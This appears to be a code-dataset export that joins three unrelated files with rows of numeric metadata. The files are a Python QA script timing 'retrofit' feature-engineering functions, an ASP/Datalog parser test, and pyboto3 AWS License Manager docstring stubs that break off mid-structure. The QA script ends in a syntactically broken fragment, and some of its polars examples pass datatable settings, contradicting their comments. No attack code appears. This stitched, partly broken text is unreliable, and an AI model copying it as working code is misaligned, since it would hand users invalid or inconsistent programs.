# OutputFrame='polars'
#########################################################################################################
#########################################################################################################
# QA FE0_AutoRollStats
import timeit
import datatable as dt
import polars as pl
from retrofit import FeatureEngineering as fe
## No Group Example
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoRollStats(data=data, ArgsList=None, RollColumnNames='Leads', DateColumnName='CalendarDateColumn', ByVariables=None, MovingAvg_Periods=[3,5,7], MovingSD_Periods=[3,5,7], MovingMin_Periods=[3,5,7], MovingMax_Periods=[3,5,7], ImputeValue=-1, Sort=True, Processing='datatable', InputFrame='datatable', OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data.names)
print(ArgsList)
# # Args
# ArgsList=None
# RollColumnNames='Leads'
# DateColumnName='CalendarDateColumn'
# ByVariables=None
# MovingAvg_Periods=[3,5,7]
# MovingSD_Periods=[3,5,7]
# MovingMin_Periods=[3,5,7]
# MovingMax_Periods=[3,5,7]
# ImputeValue=-1
# Sort=True
# Processing='datatable'
# InputFrame='datatable'
# OutputFrame='datatable'
## No Group Example
data = pl.read_csv("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoRollStats(data=data, ArgsList=None, RollColumnNames='Leads', DateColumnName='CalendarDateColumn', ByVariables=None, MovingAvg_Periods=[3,5,7], MovingSD_Periods=[3,5,7], MovingMin_Periods=[3,5,7], MovingMax_Periods=[3,5,7], ImputeValue=-1, Sort=True, Processing='datatable', InputFrame='datatable', OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data.names)
print(ArgsList)
# # Args
# ArgsList=None
# RollColumnNames='Leads'
# DateColumnName='CalendarDateColumn'
# ByVariables=None
# MovingAvg_Periods=[3,5,7]
# MovingSD_Periods=[3,5,7]
# MovingMin_Periods=[3,5,7]
# MovingMax_Periods=[3,5,7]
# ImputeValue=-1
# Sort=True
# Processing='polars'
# InputFrame='polars'
# OutputFrame='polars'
## Group and Multiple Periods and RollColumnNames:
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoRollStats(data=data, ArgsList=None, RollColumnNames=['Leads','XREGS1'], DateColumnName='CalendarDateColumn', ByVariables=['MarketingSegments','MarketingSegments2','MarketingSegments3', 'Label'], MovingAvg_Periods=[3,5,7], MovingSD_Periods=[3,5,7], MovingMin_Periods=[3,5,7], MovingMax_Periods=[3,5,7], ImputeValue=-1, Sort=True, Processing='datatable', InputFrame='datatable', OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data.names)
print(ArgsList)
# # Args
# ArgsList=None
# RollColumnNames=['Leads','XREGS1']
# DateColumnName='CalendarDateColumn'
# ByVariables=['MarketingSegment','MarketingSegment2','MarketingSegment3', 'Label']
# MovingAvg_Periods=[3,5,7]
# MovingSD_Periods=[3,5,7]
# MovingMin_Periods=[3,5,7]
# MovingMax_Periods=[3,5,7]
# ImputeValue=-1
# Sort=True
# Processing='datatable'
# InputFrame='datatable'
# OutputFrame='datatable'
## No Group Example:
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoRollStats(data=data, ArgsList=None, RollColumnNames='Leads', DateColumnName='CalendarDateColumn', ByVariables=None, MovingAvg_Periods=[3,5,7], MovingSD_Periods=[3,5,7], MovingMin_Periods=[3,5,7], MovingMax_Periods=[3,5,7], ImputeValue=-1, Sort=True, Processing='datatable', InputFrame='datatable', OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data.names)
print(ArgsList)
# # Args
# ArgsList=None
# RollColumnNames='Leads'
# DateColumnName='CalendarDateColumn'
# ByVariables=None
# MovingAvg_Periods=[3,5,7]
# MovingSD_Periods=[3,5,7]
# MovingMin_Periods=[3,5,7]
# MovingMax_Periods=[3,5,7]
# ImputeValue=-1
# Sort=True
# Processing='datatable'
# InputFrame='datatable'
# OutputFrame='datatable'
#########################################################################################################
#########################################################################################################
# QA FE0_AutoDiff
import timeit
import datatable as dt
from datatable import sort, f, by
import retrofit
from retrofit import FeatureEngineering as fe
## Group Example:
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoDiff(data=data, ArgsList=None, DateColumnName = 'CalendarDateColumn', ByVariables = ['MarketingSegments','MarketingSegments2','MarketingSegments3', 'Label'], DiffNumericVariables = 'Leads', DiffDateVariables = 'CalendarDateColumn', DiffGroupVariables = None, NLag1 = 0, NLag2 = 1, Sort=True, Processing = 'datatable', InputFrame = 'datatable', OutputFrame = 'datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data.names)
print(ArgsList)
# # Args
# ArgsList=None
# DateColumnName = 'CalendarDateColumn'
# ByVariables = ['MarketingSegment','MarketingSegment2','MarketingSegment3', 'Label']
# DiffNumericVariables = 'Leads'
# DiffDateVariables = 'CalendarDateColumn'
# DiffGroupVariables = None
# NLag1 = 0
# NLag2 = 1
# Sort=True
# Processing = 'datatable'
# InputFrame = 'datatable'
# OutputFrame = 'datatable'
## Group and Multiple Periods and RollColumnNames:
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoDiff(data=data, ArgsList=None, DateColumnName = 'CalendarDateColumn', ByVariables = ['MarketingSegments','MarketingSegments2','MarketingSegments3', 'Label'], DiffNumericVariables = 'Leads', DiffDateVariables = 'CalendarDateColumn', DiffGroupVariables = None, NLag1 = 0, NLag2 = 1, Sort=True, Processing = 'datatable', InputFrame = 'datatable', OutputFrame = 'datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data.names)
print(ArgsList)
# # Args
# ArgsList=None
# DateColumnName = 'CalendarDateColumn'
# ByVariables = ['MarketingSegment','MarketingSegment2','MarketingSegment3', 'Label']
# DiffNumericVariables = 'Leads'
# DiffDateVariables = 'CalendarDateColumn'
# DiffGroupVariables = None
# NLag1 = 0
# NLag2 = 1
# Sort=True
# Processing = 'datatable'
# InputFrame = 'datatable'
# OutputFrame = 'datatable'
## No Group Example:
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoDiff(data=data, ArgsList=None, DateColumnName = 'CalendarDateColumn', ByVariables = None, DiffNumericVariables = 'Leads', DiffDateVariables = 'CalendarDateColumn', DiffGroupVariables = None, NLag1 = 0, NLag2 = 1, Sort=True, Processing = 'datatable', InputFrame = 'datatable', OutputFrame = 'datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data.names)
print(ArgsList)
# # Args
# ArgsList=None
# DateColumnName = 'CalendarDateColumn'
# ByVariables = None
# DiffNumericVariables = 'Leads'
# DiffDateVariables = 'CalendarDateColumn'
# DiffGroupVariables = None
# NLag1 = 0
# NLag2 = 1
# Sort=True
# Processing = 'datatable'
# InputFrame = 'datatable'
# OutputFrame = 'datatable'
#########################################################################################################
#########################################################################################################
# QA FE0_AutoDiff
import timeit
import datatable as dt
from datatable import sort, f, by
import retrofit
from retrofit import FeatureEngineering as fe
# FE1_AutoCalendarVariables
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE1_AutoCalendarVariables(data=data, ArgsList=None, DateColumnNames = 'CalendarDateColumn', CalendarVariables = ['wday','mday','wom','month','quarter','year'], Processing = 'datatable', InputFrame = 'datatable', OutputFrame = 'datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
print(data.names)
#########################################################################################################
#########################################################################################################
# Example: datatable
import timeit
import datatable as dt
import retrofit
from retrofit import FeatureEngineering as fe
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE1_DummyVariables(
data=data,
ArgsList=None,
CategoricalColumnNames=['MarketingSegments','MarketingSegments2'],
Processing='datatable',
InputFrame='datatable',
OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data = Output['data']
ArgsList = Output['ArgsList']
# Example: polars
import retrofit
from retrofit import FeatureEngineering as fe
import polars as pl
data = pl.read_csv("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE1_DummyVariables(
data=data,
ArgsList=None,
CategoricalColumnNames=['MarketingSegments','MarketingSegments2'],
Processing='polars',
InputFrame='polars',
OutputFrame='polars')
t_end = timeit.default_timer()
print(t_end - t_start)
data = Output['data']
ArgsList = Output['ArgsList']
#########################################################################################################
#########################################################################################################
# FE2_AutoDataParition
import timeit
import datatable as dt
import polars as pl
import retrofit
from retrofit import FeatureEngineering as fe
from retrofit import utils as u
# datatable random Example
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
DataSets = fe.FE2_AutoDataParition(
data=data,
ArgsList=None,
DateColumnName='CalendarDateColumn',
PartitionType='random',
Ratios=[0.70,0.20,0.10],
Sort = False,
ByVariables=None,
Processing='datatable',
InputFrame='datatable',
OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
TrainData = DataSets['TrainData']
ValidationData = DataSets['ValidationData']
TestData = DataSets['TestData']
ArgsList = DataSets['ArgsList']
# data=data
# ArgsList=None
# DateColumnName='CalendarDateColumn'
# PartitionType='random'
# Ratios=[0.70,0.20,0.10]
# Sort = False
# ByVariables=None
# Processing='datatable'
# InputFrame='datatable'
# OutputFrame='datatable'
# polars random Example
data = pl.read_csv("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
DataSets = fe.FE2_AutoDataParition(
data=data,
ArgsList=None,
DateColumnName='CalendarDateColumn',
PartitionType='random',
Ratios=[0.70,0.20,0.10],
ByVariables=None,
Sort = False,
Processing='polars',
InputFrame='polars',
OutputFrame='polars')
t_end = timeit.default_timer()
print(t_end - t_start)
TrainData = DataSets['TrainData']
ValidationData = DataSets['ValidationData']
TestData = DataSets['TestData']
ArgsList = DataSets['ArgsList']
# data=data
# ArgsList=None
# DateColumnName='CalendarDateColumn'
# PartitionType='random'
# Ratios=[0.70,0.20,0.10]
# Sort = False
# ByVariables=None
# Processing='polars'
# InputFrame='polars'
# OutputFrame='polars'
# datatable time Example
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
DataSets = fe.FE2_AutoDataParition(
data=data,
ArgsList=None,
DateColumnName='CalendarDateColumn',
PartitionType='time',
Ratios=[0.70,0.20,0.10],
Sort = True,
ByVariables=None,
Processing='datatable',
InputFrame='datatable',
OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
TrainData = DataSets['TrainData']
ValidationData = DataSets['ValidationData']
TestData = DataSets['TestData']
ArgsList = DataSets['ArgsList']
# data=data
# ArgsList=None
# DateColumnName='CalendarDateColumn'
# PartitionType='time'
# Ratios=[0.70,0.20,0.10]
# Sort = False
# ByVariables=None
# Processing='datatable'
# InputFrame='datatable'
# OutputFrame='datatable'
# polars time Example
data = pl.read_csv("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
DataSets = fe.FE2_AutoDataParition(
data=data,
ArgsList=None,
DateColumnName='CalendarDateColumn',
PartitionType='time',
Ratios=[0.70,0.20,0.10],
ByVariables=None,
Sort = True,
Processing='polars',
InputFrame='polars',
OutputFrame='polars')
t_end = timeit.default_timer()
print(t_end - t_start)
TrainData = DataSets['TrainData']
ValidationData = DataSets['ValidationData']
TestData = DataSets['TestData']
ArgsList = DataSets['ArgsList']
# data=data
# ArgsList=None
# DateColumnName='CalendarDateColumn'
# PartitionType='time'
# Ratios=[0.70,0.20,0.10]
# Sort = False
# ByVariables=None
# Processing='polars'
# InputFrame='polars'
# OutputFrame='polars'
for i in data.shape[1]:
if not isinstance(data[i].dtype, pl.Categorical)
data[i] = data[i].cast(pl.Categorical)
data.sort(DateColumnName, reverse = False, in_place = True)
| 33.964286
| 421
| 0.71572
| 2,099
| 19,020
| 6.396379
| 0.061934
| 0.017876
| 0.053627
| 0.023834
| 0.961195
| 0.961195
| 0.961195
| 0.958886
| 0.948086
| 0.929093
| 0
| 0.018226
| 0.091325
| 19,020
| 559
| 422
| 34.025045
| 0.758607
| 0.27571
| 0
| 0.948905
| 0
| 0
| 0.223362
| 0.07857
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.116788
| null | null | 0.171533
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c5941d48d565f0d8cd6c7e74b039f2807bc1987c
| 735
|
py
|
Python
|
tests/parser/grounding.8.simplified.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/grounding.8.simplified.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/grounding.8.simplified.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
att_val(perGrant,name,nameCG).
att_val(perGrant,name,nameGrant).
att_val(nameCG,lastName,"Grant").
att_val(nameGrant,lastName,"Leach").
acted(perGrant,m12).
involved(P,M) :- acted(P,M).
matchingMovie(q1, m12).
inferred_topic(X5, X1) :- matchingMovie(X5, X4), involved(X3, X4), att_val(X3, name, X2), att_val(X2, lastName, X1).
"""
output = """
att_val(perGrant,name,nameCG).
att_val(perGrant,name,nameGrant).
att_val(nameCG,lastName,"Grant").
att_val(nameGrant,lastName,"Leach").
acted(perGrant,m12).
involved(P,M) :- acted(P,M).
matchingMovie(q1, m12).
inferred_topic(X5, X1) :- matchingMovie(X5, X4), involved(X3, X4), att_val(X3, name, X2), att_val(X2, lastName, X1).
"""
| 19.864865
| 117
| 0.668027
| 106
| 735
| 4.5
| 0.235849
| 0.150943
| 0.1174
| 0.150943
| 0.976939
| 0.976939
| 0.976939
| 0.976939
| 0.976939
| 0.976939
| 0
| 0.047393
| 0.138776
| 735
| 36
| 118
| 20.416667
| 0.706161
| 0
| 0
| 0.9
| 0
| 0.1
| 0.955903
| 0.375533
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c5f5a6438107ba3b569498d324c3893a7272f60a
| 57,120
|
py
|
Python
|
pyboto3/licensemanager.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 91
|
2016-12-31T11:38:37.000Z
|
2021-09-16T19:33:23.000Z
|
pyboto3/licensemanager.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 7
|
2017-01-02T18:54:23.000Z
|
2020-08-11T13:54:02.000Z
|
pyboto3/licensemanager.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 26
|
2016-12-31T13:11:00.000Z
|
2022-03-03T21:01:12.000Z
|
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
"""
pass
def create_license_configuration(Name=None, Description=None, LicenseCountingType=None, LicenseCount=None, LicenseCountHardLimit=None, LicenseRules=None, Tags=None, ProductInformationList=None):
"""
Creates a license configuration.
A license configuration is an abstraction of a customer license agreement that can be consumed and enforced by License Manager. Components include specifications for the license type (licensing by instance, socket, CPU, or vCPU), allowed tenancy (shared tenancy, Dedicated Instance, Dedicated Host, or all of these), host affinity (how long a VM must be associated with a host), and the number of licenses purchased and used.
See also: AWS API Documentation
Exceptions
:example: response = client.create_license_configuration(
Name='string',
Description='string',
LicenseCountingType='vCPU'|'Instance'|'Core'|'Socket',
LicenseCount=123,
LicenseCountHardLimit=True|False,
LicenseRules=[
'string',
],
Tags=[
{
'Key': 'string',
'Value': 'string'
},
],
ProductInformationList=[
{
'ResourceType': 'string',
'ProductInformationFilterList': [
{
'ProductInformationFilterName': 'string',
'ProductInformationFilterValue': [
'string',
],
'ProductInformationFilterComparator': 'string'
},
]
},
]
)
:type Name: string
:param Name: [REQUIRED]\nName of the license configuration.\n
:type Description: string
:param Description: Description of the license configuration.
:type LicenseCountingType: string
:param LicenseCountingType: [REQUIRED]\nDimension used to track the license inventory.\n
:type LicenseCount: integer
:param LicenseCount: Number of licenses managed by the license configuration.
:type LicenseCountHardLimit: boolean
:param LicenseCountHardLimit: Indicates whether hard or soft license enforcement is used. Exceeding a hard limit blocks the launch of new instances.
:type LicenseRules: list
:param LicenseRules: License rules. The syntax is #name=value (for example, #allowedTenancy=EC2-DedicatedHost). Available rules vary by dimension.\n\nCores dimension: allowedTenancy | maximumCores | minimumCores\nInstances dimension: allowedTenancy | maximumCores | minimumCores | maximumSockets | minimumSockets | maximumVcpus | minimumVcpus\nSockets dimension: allowedTenancy | maximumSockets | minimumSockets\nvCPUs dimension: allowedTenancy | honorVcpuOptimization | maximumVcpus | minimumVcpus\n\n\n(string) --\n\n
:type Tags: list
:param Tags: Tags to add to the license configuration.\n\n(dict) --Details about a tag for a license configuration.\n\nKey (string) --Tag key.\n\nValue (string) --Tag value.\n\n\n\n\n
:type ProductInformationList: list
:param ProductInformationList: Product information.\n\n(dict) --Describes product information for a license configuration.\n\nResourceType (string) -- [REQUIRED]Resource type. The value is SSM_MANAGED .\n\nProductInformationFilterList (list) -- [REQUIRED]Product information filters. The following filters and logical operators are supported:\n\nApplication Name - The name of the application. Logical operator is EQUALS .\nApplication Publisher - The publisher of the application. Logical operator is EQUALS .\nApplication Version - The version of the application. Logical operator is EQUALS .\nPlatform Name - The name of the platform. Logical operator is EQUALS .\nPlatform Type - The platform type. Logical operator is EQUALS .\nLicense Included - The type of license included. Logical operators are EQUALS and NOT_EQUALS . Possible values are sql-server-enterprise | sql-server-standard | sql-server-web | windows-server-datacenter .\n\n\n(dict) --Describes product information filters.\n\nProductInformationFilterName (string) -- [REQUIRED]Filter name.\n\nProductInformationFilterValue (list) -- [REQUIRED]Filter value.\n\n(string) --\n\n\nProductInformationFilterComparator (string) -- [REQUIRED]Logical operator.\n\n\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'LicenseConfigurationArn': 'string'
}
Response Structure
(dict) --
LicenseConfigurationArn (string) --
Amazon Resource Name (ARN) of the license configuration.
Exceptions
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.ResourceLimitExceededException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
:return: {
'LicenseConfigurationArn': 'string'
}
:returns:
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.ResourceLimitExceededException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
"""
pass
def delete_license_configuration(LicenseConfigurationArn=None):
"""
Deletes the specified license configuration.
You cannot delete a license configuration that is in use.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_license_configuration(
LicenseConfigurationArn='string'
)
:type LicenseConfigurationArn: string
:param LicenseConfigurationArn: [REQUIRED]\nID of the license configuration.\n
:rtype: dict
ReturnsResponse Syntax{}
Response Structure
(dict) --
Exceptions
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
:return: {}
:returns:
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to\nClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid\nfor. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By\ndefault, the http method is whatever is used in the method\'s model.
"""
pass
def get_license_configuration(LicenseConfigurationArn=None):
"""
Gets detailed information about the specified license configuration.
See also: AWS API Documentation
Exceptions
:example: response = client.get_license_configuration(
LicenseConfigurationArn='string'
)
:type LicenseConfigurationArn: string
:param LicenseConfigurationArn: [REQUIRED]\nAmazon Resource Name (ARN) of the license configuration.\n
:rtype: dict
ReturnsResponse Syntax{
'LicenseConfigurationId': 'string',
'LicenseConfigurationArn': 'string',
'Name': 'string',
'Description': 'string',
'LicenseCountingType': 'vCPU'|'Instance'|'Core'|'Socket',
'LicenseRules': [
'string',
],
'LicenseCount': 123,
'LicenseCountHardLimit': True|False,
'ConsumedLicenses': 123,
'Status': 'string',
'OwnerAccountId': 'string',
'ConsumedLicenseSummaryList': [
{
'ResourceType': 'EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE',
'ConsumedLicenses': 123
},
],
'ManagedResourceSummaryList': [
{
'ResourceType': 'EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE',
'AssociationCount': 123
},
],
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'ProductInformationList': [
{
'ResourceType': 'string',
'ProductInformationFilterList': [
{
'ProductInformationFilterName': 'string',
'ProductInformationFilterValue': [
'string',
],
'ProductInformationFilterComparator': 'string'
},
]
},
],
'AutomatedDiscoveryInformation': {
'LastRunTime': datetime(2015, 1, 1)
}
}
Response Structure
(dict) --
LicenseConfigurationId (string) --Unique ID for the license configuration.
LicenseConfigurationArn (string) --Amazon Resource Name (ARN) of the license configuration.
Name (string) --Name of the license configuration.
Description (string) --Description of the license configuration.
LicenseCountingType (string) --Dimension on which the licenses are counted.
LicenseRules (list) --License rules.
(string) --
LicenseCount (integer) --Number of available licenses.
LicenseCountHardLimit (boolean) --Sets the number of available licenses as a hard limit.
ConsumedLicenses (integer) --Number of licenses assigned to resources.
Status (string) --License configuration status.
OwnerAccountId (string) --Account ID of the owner of the license configuration.
ConsumedLicenseSummaryList (list) --Summaries of the licenses consumed by resources.
(dict) --Details about license consumption.
ResourceType (string) --Resource type of the resource consuming a license.
ConsumedLicenses (integer) --Number of licenses consumed by the resource.
ManagedResourceSummaryList (list) --Summaries of the managed resources.
(dict) --Summary information about a managed resource.
ResourceType (string) --Type of resource associated with a license.
AssociationCount (integer) --Number of resources associated with licenses.
Tags (list) --Tags for the license configuration.
(dict) --Details about a tag for a license configuration.
Key (string) --Tag key.
Value (string) --Tag value.
ProductInformationList (list) --Product information.
(dict) --Describes product information for a license configuration.
ResourceType (string) --Resource type. The value is SSM_MANAGED .
ProductInformationFilterList (list) --Product information filters. The following filters and logical operators are supported:
Application Name - The name of the application. Logical operator is EQUALS .
Application Publisher - The publisher of the application. Logical operator is EQUALS .
Application Version - The version of the application. Logical operator is EQUALS .
Platform Name - The name of the platform. Logical operator is EQUALS .
Platform Type - The platform type. Logical operator is EQUALS .
License Included - The type of license included. Logical operators are EQUALS and NOT_EQUALS . Possible values are sql-server-enterprise | sql-server-standard | sql-server-web | windows-server-datacenter .
(dict) --Describes product information filters.
ProductInformationFilterName (string) --Filter name.
ProductInformationFilterValue (list) --Filter value.
(string) --
ProductInformationFilterComparator (string) --Logical operator.
AutomatedDiscoveryInformation (dict) --Automated discovery information.
LastRunTime (datetime) --Time that automated discovery last ran.
Exceptions
LicenseManager.Client.exceptions.InvalidParameterValueException
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
:return: {
'LicenseConfigurationId': 'string',
'LicenseConfigurationArn': 'string',
'Name': 'string',
'Description': 'string',
'LicenseCountingType': 'vCPU'|'Instance'|'Core'|'Socket',
'LicenseRules': [
'string',
],
'LicenseCount': 123,
'LicenseCountHardLimit': True|False,
'ConsumedLicenses': 123,
'Status': 'string',
'OwnerAccountId': 'string',
'ConsumedLicenseSummaryList': [
{
'ResourceType': 'EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE',
'ConsumedLicenses': 123
},
],
'ManagedResourceSummaryList': [
{
'ResourceType': 'EC2_INSTANCE'|'EC2_HOST'|'EC2_AMI'|'RDS'|'SYSTEMS_MANAGER_MANAGED_INSTANCE',
'AssociationCount': 123
},
],
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'ProductInformationList': [
{
'ResourceType': 'string',
'ProductInformationFilterList': [
{
'ProductInformationFilterName': 'string',
'ProductInformationFilterValue': [
'string',
],
'ProductInformationFilterComparator': 'string'
},
]
},
],
'AutomatedDiscoveryInformation': {
'LastRunTime': datetime(2015, 1, 1)
}
}
:returns:
Application Name - The name of the application. Logical operator is EQUALS .
Application Publisher - The publisher of the application. Logical operator is EQUALS .
Application Version - The version of the application. Logical operator is EQUALS .
Platform Name - The name of the platform. Logical operator is EQUALS .
Platform Type - The platform type. Logical operator is EQUALS .
License Included - The type of license included. Logical operators are EQUALS and NOT_EQUALS . Possible values are sql-server-enterprise | sql-server-standard | sql-server-web | windows-server-datacenter .
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
ReturnsA paginator object.
"""
pass
def get_service_settings():
"""
Gets the License Manager settings for the current Region.
See also: AWS API Documentation
Exceptions
:example: response = client.get_service_settings()
:rtype: dict
ReturnsResponse Syntax{
'S3BucketArn': 'string',
'SnsTopicArn': 'string',
'OrganizationConfiguration': {
'EnableIntegration': True|False
},
'EnableCrossAccountsDiscovery': True|False,
'LicenseManagerResourceShareArn': 'string'
}
Response Structure
(dict) --
S3BucketArn (string) --Regional S3 bucket path for storing reports, license trail event data, discovery data, and so on.
SnsTopicArn (string) --SNS topic configured to receive notifications from License Manager.
OrganizationConfiguration (dict) --Indicates whether AWS Organizations has been integrated with License Manager for cross-account discovery.
EnableIntegration (boolean) --Enables AWS Organization integration.
EnableCrossAccountsDiscovery (boolean) --Indicates whether cross-account discovery has been enabled.
LicenseManagerResourceShareArn (string) --Amazon Resource Name (ARN) of the AWS resource share. The License Manager master account will provide member accounts with access to this share.
Exceptions
LicenseManager.Client.exceptions.ServerInternalException
LicenseManager.Client.exceptions.AuthorizationException
LicenseManager.Client.exceptions.AccessDeniedException
LicenseManager.Client.exceptions.RateLimitExceededException
:return: {
'S3BucketArn': 'string',
'SnsTopicArn': 'string',
'OrganizationConfiguration': {
'EnableIntegration': True|False
},
